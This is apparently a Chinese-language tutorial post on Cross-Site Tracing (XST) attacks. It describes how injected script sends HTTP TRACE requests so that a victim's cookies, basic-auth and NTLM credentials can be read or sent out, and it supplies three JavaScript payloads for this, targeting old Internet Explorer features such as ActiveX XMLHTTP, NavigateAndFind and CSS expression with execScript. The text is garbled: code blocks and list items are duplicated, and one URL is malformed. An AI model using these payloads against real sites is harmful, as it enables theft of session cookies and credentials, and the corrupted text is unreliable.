XST***描述:
***者將惡意代碼嵌入一臺已經被控制的主機上的web文件,當訪問者瀏覽時惡意代碼在瀏覽器中執行,然後訪問者的cookie、http基本驗證以及ntlm驗證信息將被髮送到已經被控制的主機,同時傳送Trace請求給目標主機,導致cookie欺騙或者是中間人***。
XST***條件:
1、需要目標web服務器允許Trace參數;
2、需要一個用來插入XST代碼的地方;
3、目標站點存在跨域漏洞。
2、需要一個用來插入XST代碼的地方;
3、目標站點存在跨域漏洞。
XST與XSS的比較:
相同點:都具有很大的欺騙性,可以對受害主機產生危害,而且這種***是多平臺多技術的,我們還可以利用Active控件、Flash、Java等來進行XST和XSS***。
優點:可以繞過一般的http驗證以及NTLM驗證
如何利用:
手法1:
<SCRIPT type=text/java script>
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");
xmlHttp.open(\"TRACE\",\"[url]http://wmjie.51.net/swords/[/url]\",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");
xmlHttp.open(\"TRACE\",\"[url]http://wmjie.51.net/swords/[/url]\",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
//-->
</SCRIPT>
<BR><INPUT type=button value=\"XSS TRACE\">
手法2:
</SCRIPT>
<BR><INPUT type=button value=\"XSS TRACE\">
手法2:
<SCRIPT type=text/java script>
<!--
function xssTRACE() {
var openWin=open(\"blank.htm\",\"swords\",\"width=500,height=400\");
var otraceswords=openWin.external;
openWin.location.href=\"[url]http://wmjie.51.net/swords/[/url]\";
setTimeout(
function () {
//以下必須寫在一行
otraceswords.NavigateAndFind('java script:xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\",\"[url]http://wmjie.51.net/swords/[/url]\",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(\"不用document.cookie 顯示站點wmjie.51.net/swords/ 的頭信息。\\n\" + xmlDoc);',\"\",\"\");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT type=button value=\"XSS TRACE\">
手法3:
<!--
function xssTRACE() {
var openWin=open(\"blank.htm\",\"swords\",\"width=500,height=400\");
var otraceswords=openWin.external;
openWin.location.href=\"[url]http://wmjie.51.net/swords/[/url]\";
setTimeout(
function () {
//以下必須寫在一行
otraceswords.NavigateAndFind('java script:xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\",\"[url]http://wmjie.51.net/swords/[/url]\",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(\"不用document.cookie 顯示站點wmjie.51.net/swords/ 的頭信息。\\n\" + xmlDoc);',\"\",\"\");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT type=button value=\"XSS TRACE\">
手法3:
<SCRIPT type=text/java script>
function xssTRACE(){
var swords = \"var xmlHttp = new ActiveXObject(\\"Microsoft.XMLHTTP\\")\;xmlHttp.open(\\"TRACE\\",\\"http://http://www.tingh.com/\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\";
var target = \"[url]http://wmjie.51.net/swords/[/url]\";
spinach = encodeURIComponent(swords + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT type=button value=\"XSS TRACE\">
function xssTRACE(){
var swords = \"var xmlHttp = new ActiveXObject(\\"Microsoft.XMLHTTP\\")\;xmlHttp.open(\\"TRACE\\",\\"http://http://www.tingh.com/\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\";
var target = \"[url]http://wmjie.51.net/swords/[/url]\";
spinach = encodeURIComponent(swords + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT type=button value=\"XSS TRACE\">